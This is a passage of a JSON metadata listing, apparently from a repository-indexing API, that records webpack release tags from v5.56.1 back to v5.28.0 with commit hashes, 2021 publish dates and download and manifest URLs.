ack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re